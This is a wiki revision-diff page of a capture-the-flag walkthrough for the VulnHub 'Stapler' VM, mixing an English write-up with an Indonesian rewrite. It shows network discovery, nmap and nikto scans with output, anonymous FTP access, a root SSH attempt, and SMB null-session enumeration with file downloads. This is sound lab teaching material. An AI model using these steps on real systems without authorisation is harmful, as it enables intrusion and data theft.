Difference between revisions of "CTF Stapler: Walkthrough"

From OnnoWiki
Jump to navigation Jump to search
(Created page with "Welcome back to my 2nd - VulnHub CTF! This time we will be tackling Stapler: 1! So if you’re ready… let’s strap in - and pwn this box! Description: +------------------...")
 
 
(20 intermediate revisions by the same user not shown)
Line 1: Line 1:
Welcome back to my 2nd - VulnHub CTF! This time we will be tackling Stapler: 1!
+
==Description==
  
So if you’re ready… let’s strap in - and pwn this box!
+
+---------------------------------------------------------+
 +
|                                                        |
 +
|                                  __..--''\              |
 +
|                          __..--''        \            |
 +
|                  __..--''          __..--''            |
 +
|          __..--''          __..--''      |            |
 +
|          \ o        __..--''____....----""              |
 +
|          \__..--''\                                    |
 +
|          |        \                                  |
 +
|          +----------------------------------+          |
 +
|          +----------------------------------+          |
 +
|                                                        |
 +
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
 +
|  Name: Stapler          |          IP: DHCP          |
 +
|  Date: 2016-June-08      |        Goal: Get Root!      |
 +
| Author: g0tmi1k          | Difficultly: ??? ;)        |
 +
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
 +
|                                                        |
 +
| + Average beginner/intermediate VM, only a few twists  |
 +
|  + May find it easy/hard (depends on YOUR background)  |
 +
|  + ...also which way you attack the box                |
 +
|                                                        |
 +
| + It SHOULD work on both VMware and Virtualbox          |
 +
|  + REBOOT the VM if you CHANGE network modes          |
 +
|  + Fusion users, you'll need to retry when importing  |
 +
|                                                        |
 +
| + There are multiple methods to-do this machine        |
 +
|  + At least two (2) paths to get a limited shell      |
 +
|  + At least three (3) ways to get a root access        |
 +
|                                                        |
 +
| + Made for BsidesLondon 2016                            |
 +
|  + Slides: https://download.vulnhub.com/media/stapler/ |
 +
|                                                        |
 +
| + Thanks g0tmi1k, nullmode, rasta_mouse & superkojiman  |
 +
|  + ...and shout-outs to the VulnHub-CTF Team =)        |
 +
|                                                        |
 +
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - -+
 +
|                                                        |
 +
|      --[[~~Enjoy. Have fun. Happy Hacking.~~]]--      |
 +
|                                                        |
 +
+---------------------------------------------------------+
  
Description:
+
==Instalasi==
+---------------------------------------------------------+
 
|                                                        |
 
|                                  __..--''\              |
 
|                          __..--''        \            |
 
|                  __..--''          __..--''            |
 
|          __..--''          __..--''      |            |
 
|          \ o        __..--''____....----""              |
 
|          \__..--''\                                    |
 
|          |        \                                  |
 
|          +----------------------------------+          |
 
|          +----------------------------------+          |
 
|                                                        |
 
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
 
|  Name: Stapler          |          IP: DHCP          |
 
|  Date: 2016-June-08      |        Goal: Get Root!      |
 
| Author: g0tmi1k          | Difficultly: ??? ;)        |
 
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
 
|                                                        |
 
| + Average beginner/intermediate VM, only a few twists  |
 
|  + May find it easy/hard (depends on YOUR background)  |
 
|  + ...also which way you attack the box                |
 
|                                                        |
 
| + It SHOULD work on both VMware and Virtualbox          |
 
|  + REBOOT the VM if you CHANGE network modes          |
 
|  + Fusion users, you'll need to retry when importing  |
 
|                                                        |
 
| + There are multiple methods to-do this machine        |
 
|  + At least two (2) paths to get a limited shell      |
 
|  + At least three (3) ways to get a root access        |
 
|                                                        |
 
| + Made for BsidesLondon 2016                            |
 
|  + Slides: https://download.vulnhub.com/media/stapler/ |
 
|                                                        |
 
| + Thanks g0tmi1k, nullmode, rasta_mouse & superkojiman  |
 
|  + ...and shout-outs to the VulnHub-CTF Team =)        |
 
|                                                        |
 
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - -+
 
|                                                        |
 
|      --[[~~Enjoy. Have fun. Happy Hacking.~~]]--      |
 
|                                                        |
 
+---------------------------------------------------------+
 
The Hack:
 
If you already read my previous post, on the Mr. Robot VM then you would already know, that the first thing we have to do (considering this is a pentest) is to enumerate!
 
  
As mentioned previously- if you want to learn more about the proper procedures and steps then I suggest you read the PTES Technical Guidelines.
+
* Download OVA
 +
* Install di VirtualBox
 +
* Jalankan
  
So let’s start the process by running netdiscover on our network to find the IP of our Target VM.
+
==Hack==
  
Currently scanning: 192.168.23.0/16  |  Screen View: Unique Hosts         
+
===netdiscover===
                                                                             
 
4 Captured ARP Req/Rep packets, from 4 hosts.  Total size: 240             
 
_____________________________________________________________________________
 
  IP            At MAC Address    Count    Len  MAC Vendor / Hostname     
 
-----------------------------------------------------------------------------
 
192.168.1.1    00:26:f2:0c:b3:82      1      60  NETGEAR                   
 
192.168.1.3    d8:cb:8a:bf:d0:59      1      60  Micro-Star INTL CO., LTD. 
 
192.168.1.13    08:00:27:3d:e7:21      1      60  Cadmus Computer Systems
 
The IP of 192.168.1.13 will be our target. The next step will be to run an nmap scan on our target, so that we can enumerate any open ports, services, versions, and OS’s.
 
  
root@kali:~# nmap -sS -A -O -n -p1-60000 192.168.1.13
+
Cek IP address server Stapler
  
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-10-04 18:33 CDT
+
netdiscover -r 192.168.0.0/24
Nmap scan report for 192.168.1.13
 
Host is up (0.00036s latency).
 
Not shown: 59988 filtered ports
 
PORT      STATE  SERVICE    VERSION
 
20/tcp    closed ftp-data
 
21/tcp    open  ftp        vsftpd 2.0.8 or later
 
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
 
|_Can't get directory listing: Can't parse PASV response: "Permission denied."
 
22/tcp    open  ssh        OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
 
| ssh-hostkey:
 
|  2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
 
|_  256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
 
53/tcp    open  domain      dnsmasq 2.75
 
| dns-nsid:
 
|  id.server:
 
|_  bind.version: dnsmasq-2.75
 
80/tcp    open  http
 
|_http-title: 404 Not Found
 
123/tcp  closed ntp
 
137/tcp  closed netbios-ns
 
138/tcp  closed netbios-dgm
 
139/tcp  open  netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
 
666/tcp  open  doom?
 
3306/tcp  open  mysql      MySQL 5.7.12-0ubuntu1
 
| mysql-info:
 
|  Protocol: 10
 
|  Version: 5.7.12-0ubuntu1
 
|  Thread ID: 7
 
|  Capabilities flags: 63487
 
|  Some Capabilities: Speaks41ProtocolNew, FoundRows, Support41Auth, LongPassword, ODBCClient, SupportsLoadDataLocal, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, SupportsTransactions, SupportsCompression, LongColumnFlag, InteractiveClient, Speaks41ProtocolOld, DontAllowDatabaseTableColumn, IgnoreSigpipes, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
 
|  Status: Autocommit
 
|  Salt: "_.\x01\x03zSl\x02\x11Td\x14\x0B(.V1x\x10\x00
 
|_  Auth Plugin Name: 88
 
12380/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
 
|_http-server-header: Apache/2.4.18 (Ubuntu)
 
|_http-title: Site doesn't have a title (text/html).
 
---snip---
 
Host script results:
 
|_clock-skew: mean: -4h59m59s, deviation: 0s, median: -4h59m59s
 
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 
| smb-os-discovery:
 
|  OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
 
|  Computer name: red
 
|  NetBIOS computer name: RED
 
|  Domain name:
 
|  FQDN: red
 
|_  System time: 2016-10-04T19:35:45+01:00
 
| smb-security-mode:
 
|  account_used: guest
 
|  authentication_level: user
 
|  challenge_response: supported
 
|_  message_signing: disabled (dangerous, but default)
 
|_smbv2-enabled: Server supports SMBv2 protocol
 
  
TRACEROUTE
+
hasilnya
HOP RTT    ADDRESS
 
1  0.36 ms 192.168.1.13
 
  
Post-scan script results:
+
  Currently scanning: Finished!  |  Screen View: Unique Hosts                                                                                                                                                                 
| clock-skew:  
+
                                                                                                                                                                                                                                 
|_ -4h59m59s: Majority of systems scanned
+
  29 Captured ARP Req/Rep packets, from 21 hosts.  Total size: 1740                                                                                                                                                             
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+
  _____________________________________________________________________________
Nmap done: 1 IP address (1 host up) scanned in 151.02 seconds
+
    IP            At MAC Address    Count    Len  MAC Vendor / Hostname     
We can see that there are a ton of valuable (and possibly vulnerable) ports open: including FTP, NetBIOS (w/ SMB Shares), MySQL, and Port 12380 running a Web Server (Apache HTTPD).
+
  -----------------------------------------------------------------------------
 +
  192.168.0.2    40:16:7e:22:e7:69      1      60  ASUSTek COMPUTER INC.                                                                                                                                                       
 +
  192.168.0.4    10:6f:3f:3d:73:d0      1      60  BUFFALO.INC                                                                                                                                                                 
 +
  192.168.0.7    4c:e6:76:1f:15:4b      1      60  BUFFALO.INC                                                                                                                                                                 
 +
  192.168.0.9    10:6f:3f:17:94:94      1      60  BUFFALO.INC                                                                                                                                                                 
 +
  192.168.0.7    4c:e6:76:1f:15:4c      1      60  BUFFALO.INC                                                                                                                                                                 
 +
  192.168.0.61    08:00:27:8b:94:43      1      60  PCS Systemtechnik GmbH                                                                                                                                                       
 +
  192.168.0.60    74:d0:2b:6a:a9:66      1      60  ASUSTek COMPUTER INC.                                                                                                                                                       
 +
  192.168.0.101  08:60:6e:db:4e:b8      1      60  ASUSTek COMPUTER INC.                                                                                                                                                       
 +
  192.168.0.141  b0:a7:b9:b6:c1:c9      3    180  TP-Link Corporation Limited                                                                                                                                                 
 +
  192.168.0.102  6c:29:90:1e:89:7f      1      60  WiZ Connected Lighting Company Limited                                                                                                                                       
 +
  192.168.0.145  c0:56:27:1c:be:e1      1      60  Belkin International Inc.                                                                                                                                                   
 +
  192.168.0.169  4c:e6:76:1f:15:4b      1      60 BUFFALO.INC                                                                                                                                                                 
 +
  192.168.0.170  4c:e6:76:1f:15:4b      1      60  BUFFALO.INC                                                                                                                                                                 
 +
  192.168.0.169  4c:e6:76:1f:15:4c      1      60  BUFFALO.INC                                                                                                                                                                 
 +
  192.168.0.170  4c:e6:76:1f:15:4c      1      60  BUFFALO.INC                                                                                                                                                                 
 +
  192.168.0.199  b4:b0:24:3d:8b:3b      1     60  TP-Link Corporation Limited                                                                                                                                                 
 +
  192.168.0.223  c0:56:27:67:0d:a3      1     60  Belkin International Inc.                                                                                                                                                    
 +
  192.168.0.224  28:ff:3e:5c:10:32      4    240  zte corporation                                                                                                                                                             
 +
  192.168.0.222  6c:16:32:63:52:21      4    240  HUAWEI TECHNOLOGIES CO.,LTD                                                                                                                                                 
 +
  192.168.0.144  6e:65:e5:8a:25:0d      1      60  Unknown vendor                                                                                                                                                               
 +
  0.0.0.0        b0:a7:b9:b6:c1:c9      1      60  TP-Link Corporation Limited
  
The first thing that caught my eye was the fact that FTP was allowing anonymous logins. So I made this my first target. Let’s go ahead and login to FTP with the username: anonymous and the password: anonymous.
 
  
root@kali:~# ftp 192.168.1.13
+
Target di VirtualBox biasanya MAC 08:00:.....
Connected to 192.168.1.13.
+
IP address target disini adalah
220-
 
220-|-----------------------------------------------------------------------------------------|
 
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
 
220-|-----------------------------------------------------------------------------------------|
 
220-
 
220
 
Name (192.168.1.13:root): anonymous
 
331 Please specify the password.
 
Password:
 
230 Login successful.
 
Remote system type is UNIX.
 
Using binary mode to transfer files.
 
ftp>
 
Nice! We were able to successfully login to the hosts FTP service as anonymous. At this point, I went ahead to check and see if there aren’t any files stored on the FTP server that I can use.
 
  
ftp> ls
+
  192.168.0.61   08:00:27:8b:94:43      1      60  PCS Systemtechnik GmbH
200 PORT command successful. Consider using PASV.
 
150 Here comes the directory listing.
 
-rw-r--r--   1 0        0            107 Jun 03 23:06 note
 
226 Directory send OK.
 
ftp> get note
 
local: note remote: note
 
200 PORT command successful. Consider using PASV.
 
150 Opening BINARY mode data connection for note (107 bytes).
 
226 Transfer complete.
 
107 bytes received in 0.00 secs (100.3767 kB/s)
 
ftp> exit
 
  
221 Goodbye.
 
We can see that after looking though the FTP server, we come across a file called note. What I did is call the get command to download the file back to our host. From out host, we can open the file and see what it contains.
 
  
root@kali:~# cat note
+
===Port Scanning===
Elly, make sure you update the payload information. Leave it in your FTP account once you’re are done, John.
 
Nothing too interesting in there - but we do have a name. We can save this name for later uses; such as user enumeration, brute forcing, etc.
 
  
After FTP, I followed up with SSH to see if I can’t log in with root - maybe there was a misconfiguration that we could take advantage of.
+
Port scanning
  
root@kali:~# ssh root@192.168.1.13
+
nmap -sS -A -O -n -p1-60000 192.168.0.61
-----------------------------------------------------------------
+
nmap -v -A 192.168.0.61
~          Barry, don't forget to put a message here          ~
 
-----------------------------------------------------------------
 
root@192.168.1.13's password:
 
Permission denied, please try again.
 
This unfortunately didn’t provide me with anything - except a name - so I moved on.
 
  
My next target focused around TCP port 139, which was an open netbios-ssn. I decided to use smbclient to see if I can’t enumerate any of the SMB Shares on the target. When prompted for the root password, I just typed in root.
+
Hasilnya kira-kira,
  
root@kali:~# smbclient -L 192.168.1.13
+
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-23 01:11 EST
WARNING: The "syslog" option is deprecated
+
Initiating SYN Stealth Scan at 01:11
Enter root's password:
+
Scanning 192.168.0.61 [1000 ports]
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
+
Discovered open port 21/tcp on 192.168.0.61
 +
Discovered open port 139/tcp on 192.168.0.61
 +
Discovered open port 3306/tcp on 192.168.0.61
 +
Discovered open port 80/tcp on 192.168.0.61
 +
Discovered open port 53/tcp on 192.168.0.61
 +
Discovered open port 22/tcp on 192.168.0.61
 +
Discovered open port 666/tcp on 192.168.0.61
 +
Scanning 7 services on 192.168.0.61
 +
Nmap scan report for 192.168.0.61
 +
Host is up (0.00066s latency).
 +
Not shown: 992 filtered tcp ports (no-response)
 +
PORT    STATE  SERVICE    VERSION
 +
20/tcp  closed ftp-data
 +
21/tcp  open  ftp        vsftpd 2.0.8 or later
 +
| ftp-syst:
 +
|  STAT:
 +
| FTP server status:
 +
|      Connected to 192.168.0.62
 +
|      Logged in as ftp
 +
|      TYPE: ASCII
 +
|      No session bandwidth limit
 +
|      Session timeout in seconds is 300
 +
|      Control connection is plain text
 +
|      Data connections will be plain text
 +
|      At session startup, client count was 4
 +
|      vsFTPd 3.0.3 - secure, fast, stable
 +
|_End of status
 +
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
 +
|_Can't get directory listing: PASV failed: 550 Permission denied.
 +
22/tcp  open  ssh        OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
 +
| ssh-hostkey:
 +
|  2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
 +
|  256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
 +
|_  256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
 +
53/tcp  open  domain      dnsmasq 2.75
 +
| dns-nsid:
 +
|  NSID: 218m83 (3231386d3833)
 +
|  id.server: CGK
 +
|_  bind.version: dnsmasq-2.75
 +
80/tcp  open  http        PHP cli server 5.5 or later
 +
|_http-title: 404 Not Found
 +
| http-methods:
 +
|_  Supported Methods: GET HEAD POST OPTIONS
 +
139/tcp  open  netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
 +
666/tcp  open  doom?
 +
| fingerprint-strings:
 +
|  NULL:
 +
|    message2.jpgUT
 +
|    QWux
 +
|    "DL[E
 +
|    #;3[
 +
|    \xf6
 +
|    u([r
 +
|    qYQq
 +
|    Y_?n2
 +
|    3&M~{
 +
|    9-a)T
 +
|    L}AJ
 +
|_    .npy.9
 +
3306/tcp open  mysql      MySQL 5.7.12-0ubuntu1
 +
| mysql-info:
 +
|  Protocol: 10
 +
|  Version: 5.7.12-0ubuntu1
 +
|  Thread ID: 10
 +
|  Capabilities flags: 63487
 +
|  Some Capabilities: LongColumnFlag, Support41Auth, Speaks41ProtocolOld, FoundRows,
 +
SupportsLoadDataLocal, InteractiveClient, SupportsTransactions, IgnoreSigpipes,
 +
Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn,
 +
LongPassword, ODBCClient, ConnectWithDatabase, SupportsCompression, SupportsAuthPlugins,
 +
SupportsMultipleResults, SupportsMultipleStatments
 +
|  Status: Autocommit
 +
|  Salt: <Xp\x1EH]w*\x1C"+\x14\x19\x16*\x15ZnR\x1D
 +
|_  Auth Plugin Name: mysql_native_password
 +
MAC Address: 08:00:27:8B:94:43 (Oracle VirtualBox virtual NIC)
 +
Device type: general purpose
 +
Running: Linux 3.X|4.X
 +
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
 +
OS details: Linux 3.2 - 4.9
 +
Uptime guess: 0.005 days (since Mon Jan 23 01:04:14 2023)
 +
Network Distance: 1 hop
 +
TCP Sequence Prediction: Difficulty=262 (Good luck!)
 +
IP ID Sequence Generation: All zeros
 +
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel 
 +
 +
Host script results:
 +
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m58s
 +
| smb2-time:
 +
|  date: 2023-01-23T13:11:23
 +
|_  start_date: N/A
 +
| smb-security-mode:
 +
|  account_used: guest
 +
|  authentication_level: user
 +
|  challenge_response: supported
 +
|_  message_signing: disabled (dangerous, but default)
 +
| nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 +
| Names:
 +
|  RED<00>              Flags: <unique><active>
 +
|  RED<03>              Flags: <unique><active>
 +
|  RED<20>              Flags: <unique><active>
 +
|  WORKGROUP<00>        Flags: <group><active>
 +
|_  WORKGROUP<1e>        Flags: <group><active>
 +
| smb2-security-mode:
 +
|  3.1.1:
 +
|_    Message signing enabled but not required
 +
| smb-os-discovery:
 +
|  OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
 +
|  Computer name: red
 +
|  NetBIOS computer name: RED\x00
 +
|  Domain name: \x00
 +
|  FQDN: red
 +
|_  System time: 2023-01-23T13:11:23+00:00
 +
 +
TRACEROUTE
 +
HOP RTT    ADDRESS
 +
1  0.66 ms 192.168.0.61
 +
 +
OS and Service detection performed. Please report any incorrect results at
 +
https://nmap.org/submit/ .
 +
Nmap done: 1 IP address (1 host up) scanned in 49.02 seconds
 +
            Raw packets sent: 2024 (90.564KB) | Rcvd: 24 (1.428KB)
  
Sharename      Type      Comment
+
Salah satu yang menarik disini adalah FTP, dengan anonymous FTP login.
---------      ----      -------
 
print$          Disk      Printer Drivers
 
kathy          Disk      Fred, What are we doing here?
 
tmp            Disk      All temporary files should be stored here
 
IPC$            IPC      IPC Service (red server (Samba, Ubuntu))
 
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
 
  
Server              Comment
+
===Anonymous FTP===
---------            -------
 
RED                  red server (Samba, Ubuntu)
 
  
Workgroup            Master
+
Coba login anonymous ftp (username anonymous password bebas merdeka)
---------           -------
+
 +
ftp 192.168.0.61
 +
Connected to 192.168.0.61.
 +
220-
 +
220-|----------------------------------------------------------------------------------------|
 +
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
 +
220-|----------------------------------------------------------------------------------------|
 +
220-
 +
220
 +
Name (192.168.0.61:kali): anonymous
 +
331 Please specify the password.
 +
Password:
 +
230 Login successful.
 +
Remote system type is UNIX.
 +
Using binary mode to transfer files.
 +
ftp>
 +
 +
Keren! cek ada file apa saja di FTP server tersebut dan ambil file yang ada :) ..
 +
 +
ftp> ls
 +
550 Permission denied.
 +
200 PORT command successful. Consider using PASV.
 +
150 Here comes the directory listing.
 +
-rw-r--r--   1 0        0            107 Jun 03  2016 note
 +
226 Directory send OK.
 +
ftp> get note
 +
local: note remote: note
 +
200 PORT command successful. Consider using PASV.
 +
150 Opening BINARY mode data connection for note (107 bytes).
 +
100%
 +
|*************************************************************************************************************************************************************************************| 
 +
107        0.91 KiB/s    00:00 ETA
 +
226 Transfer complete.
 +
107 bytes received in 00:00 (0.91 KiB/s)
 +
ftp> quit
 +
221 Goodbye.
 +
 +
Buka note
 +
 +
cat note                   
 +
 +
Isinya,
 +
 +
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
 +
         
 +
Tidak ada yang terlalu menarik,tapi ada dua (2) nama :)  ... mungkin bisa membantu nanti jika kita butuh bruteforce.
  
WORKGROUP            RED
+
==Coba SSH root==
As we can see, there are 2 active shares - kathy, and tmp. The thing that really caught my attention was the comment - Fred, What are we doing here?. This led me to believe that Fred had access to kathy’s share. So what I attempted to do was to connect to kathy’s share, using the networked user/computer fred.
 
  
root@kali:~# smbclient //fred/kathy -I 192.168.1.13 -N
+
Coba akses.
WARNING: The "syslog" option is deprecated
 
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
 
smb: \> ls
 
  .                                  D        0  Fri Jun  3 11:52:52 2016
 
  ..                                  D        0  Mon Jun  6 16:39:56 2016
 
  kathy_stuff                        D        0  Sun Jun  5 10:02:27 2016
 
  backup                              D        0  Sun Jun  5 10:04:14 2016
 
  
19478204 blocks of size 1024. 16396996 blocks available
+
ssh root@192.168.0.61                                                                                                 
Nice! Looks like we were able to establish a connection! From here, I began to enumerate the files and folder on the share. For any of the files I found, I went ahead and used the get command to download it back to my host, just like in FTP.
 
  
smb: \> cd kathy_stuff
+
Hasilnya gagal,
smb: \kathy_stuff\> ls
 
  .                                  D        0  Sun Jun  5 10:02:27 2016
 
  ..                                  D        0  Fri Jun  3 11:52:52 2016
 
  todo-list.txt                      N      64  Sun Jun  5 10:02:27 2016
 
  
19478204 blocks of size 1024. 16396996 blocks available
+
The authenticity of host '192.168.0.61 (192.168.0.61)' can't be established.
smb: \kathy_stuff\> get todo-list.txt
+
ED25519 key fingerprint is SHA256:eKqLSFHjJECXJ3AvqDaqSI9kP+EbRmhDaNZGyOrlZ2A.
getting file \kathy_stuff\todo-list.txt of size 64 as todo-list.txt (1.2 KiloBytes/sec) (average 1.2 KiloBytes/sec)
+
This key is not known by any other names
smb: \kathy_stuff\> cd ..
+
  Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
smb: \> ls
+
  Warning: Permanently added '192.168.0.61' (ED25519) to the list of known hosts.
  .                                  D        0 Fri Jun 3 11:52:52 2016
+
  -----------------------------------------------------------------
  ..                                 D        Mon Jun 6 16:39:56 2016
+
  ~          Barry, don't forget to put a message here          ~
  kathy_stuff                        D        0 Sun Jun 5 10:02:27 2016
+
  -----------------------------------------------------------------
  backup                              D        0 Sun Jun  5 10:04:14 2016
+
  root@192.168.0.61's password:  
 +
  Permission denied, please try again.
  
19478204 blocks of size 1024. 16396996 blocks available
 
smb: \> cd backup
 
smb: \backup\> ls
 
  .                                  D        0  Sun Jun  5 10:04:14 2016
 
  ..                                  D        0  Fri Jun  3 11:52:52 2016
 
  vsftpd.conf                        N    5961  Sun Jun  5 10:03:45 2016
 
  wordpress-4.tar.gz                  N  6321767  Mon Apr 27 12:14:46 2015
 
  
19478204 blocks of size 1024. 16396996 blocks available
+
Tapi kita dapat satu nama lagi :) ..
smb: \backup\> get vsftpd.conf
 
getting file \backup\vsftpd.conf of size 5961 as vsftpd.conf (1940.4 KiloBytes/sec) (average 118.2 KiloBytes/sec)
 
smb: \backup\> get wordpress-4.tar.gz
 
getting file \backup\wordpress-4.tar.gz of size 6321767 as wordpress-4.tar.gz (22780.8 KiloBytes/sec) (average 16717.0 KiloBytes/sec)
 
  
smb: \> exit
+
==Coba SMB==
Once we are done with kathy’s share, we can go ahead and login to the tmp share and do the same.
 
  
root@kali:~# smbclient //fred/tmp -I 192.168.1.13 -N
+
Coba,
WARNING: The "syslog" option is deprecated
+
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
+
smbclient -L 192.168.0.61
smb: \> ls
+
  .                                  D        0 Tue Jun 7 03:08:39 2016
+
Password for [WORKGROUP\root]:
  ..                                  D        0 Mon Jun  6 16:39:56 2016
+
  ls                                  N      274  Sun Jun  5 10:32:58 2016
+
Coba isi password dengan root. Untung2-an berhasil :) ..  
 +
Hasilnya kira-kira
 +
 +
        Sharename      Type      Comment
 +
        ---------      ----      -------
 +
        print$          Disk      Printer Drivers
 +
        kathy          Disk      Fred, What are we doing here?
 +
        tmp            Disk      All temporary files should be stored here
 +
        IPC$            IPC      IPC Service (red server (Samba, Ubuntu))
 +
Reconnecting with SMB1 for workgroup listing.
 +
   
 +
        Server              Comment
 +
        ---------            -------  
 +
   
 +
        Workgroup            Master
 +
        ---------            -------
 +
        WORKGROUP            SCANDISK
  
19478204 blocks of size 1024. 16396996 blocks available
 
smb: \> get ls
 
getting file \ls of size 274 as ls (13.4 KiloBytes/sec) (average 13.4 KiloBytes/sec)
 
smb: \> exit
 
Out of the files we got, we had a WordPress Backup, a FTP Configuration file, an LS file, and a to-do-list.
 
  
Let’s open to-do-list.txt and the ls file to see if we can’t find anything interesting.
+
Tampaknya ada 2 active share - kathy dan tmp.
 +
Yang menarik ada komentar - Fred, What are we doing here?
 +
Tampaknya Fred bisa mengakses kathy share.
 +
Mari kita akses kathy share menggunakan networked user/computer fred.
  
root@kali:~# cat to-do-list.txt
+
smbclient //fred/kathy -I 192.168.0.61 -N
I'm making sure to backup anything important for Initech, Kathy
 
root@kali:~# cat ls
 
.:
 
total 12.0K
 
drwxrwxrwt  2 root root 4.0K Jun  5 16:32 .
 
drwxr-xr-x 16 root root 4.0K Jun  3 22:06 ..
 
-rw-r--r--  1 root root    0 Jun  5 16:32 ls
 
drwx------  3 root root 4.0K Jun  5 15:32 systemd-private-df2bff9b90164a2eadc490c0b8f76087-systemd-timesyncd.service-vFKoxJ
 
From the to-do-list we have another name, and from LS it seems we have a directory listing of a time synchronization daemon… for now I will skip this as nothing showed up in the Samba Enumeration, and the information is rather useless.
 
  
Okay - so we already enumerated a few of the file daemons, and connection based daemons. We will move on and try to access the Apache web server this time. We can navigate to 192.168.1.13:12380 to access the Apache Web Server. Once done, we will be presented with the following.
+
Coba check ls
  
 +
Try "help" to get a list of possible commands.
 +
smb: \> ls
 +
  .                                  D        0  Fri Jun  3 12:52:52 2016
 +
  ..                                  D        0  Mon Jun  6 17:39:56 2016
 +
  kathy_stuff                        D        0  Sun Jun  5 11:02:27 2016
 +
  backup                              D        0  Sun Jun  5 11:04:14 2016
 +
 +
                19478204 blocks of size 1024. 16397108 blocks available
 +
smb: \>
 +
 +
Keren! tampaknya kita bisa tersambung.
 +
Lakukan enumerate file dan folder.
  
 +
smb: \> cd kathy_stuff\
 +
smb: \kathy_stuff\> ls
 +
  .                                  D        0  Sun Jun  5 11:02:27 2016
 +
  ..                                  D        0  Fri Jun  3 12:52:52 2016
 +
  todo-list.txt                      N      64  Sun Jun  5 11:02:27 2016
 +
 +
                19478204 blocks of size 1024. 16397108 blocks available
 +
smb: \kathy_stuff\> get todo-list.txt
 +
getting file \kathy_stuff\todo-list.txt of size 64 as todo-list.txt (3.3 KiloBytes/sec)
 +
(average 3.3 KiloBytes/sec)
 +
smb: \kathy_stuff\> cd ..
 +
smb: \> cd backup\
 +
smb: \backup\> ls
 +
  .                                  D        0  Sun Jun  5 11:04:14 2016
 +
  ..                                  D        0  Fri Jun  3 12:52:52 2016
 +
  vsftpd.conf                        N    5961  Sun Jun  5 11:03:45 2016
 +
  wordpress-4.tar.gz                  N  6321767  Mon Apr 27 13:14:46 2015
  
My first choice was to look at the websites source code to see if there aren’t any clues left… unfortunately there wasn’t. So I decided to fire up and run a nikto scan on the web server to check for any vulnerabilities and possible misconfigurations.
+
                19478204 blocks of size 1024. 16397108 blocks available
 +
smb: \backup\> get vsftpd.conf
 +
getting file \backup\vsftpd.conf of size 5961 as vsftpd.conf (306.4 KiloBytes/sec) (average 154.8 KiloBytes/sec)
 +
smb: \backup\> quit
  
root@kali:~# nikto -h 192.168.1.13:12380
 
- Nikto v2.1.6
 
---------------------------------------------------------------------------
 
+ Target IP:          192.168.1.13
 
+ Target Hostname:    192.168.1.13
 
+ Target Port:        12380
 
---------------------------------------------------------------------------
 
+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
 
                  Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
 
                  Issuer:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
 
+ Start Time:        2016-10-04 19:44:23 (GMT-5)
 
---------------------------------------------------------------------------
 
+ Server: Apache/2.4.18 (Ubuntu)
 
+ Server leaks inodes via ETags, header found with file /, fields: 0x15 0x5347c53a972d1
 
+ The anti-clickjacking X-Frame-Options header is not present.
 
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
 
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
 
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
 
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
 
+ No CGI Directories found (use '-C all' to force check all possible dirs)
 
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
 
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
 
+ "robots.txt" contains 2 entries which should be manually viewed.
 
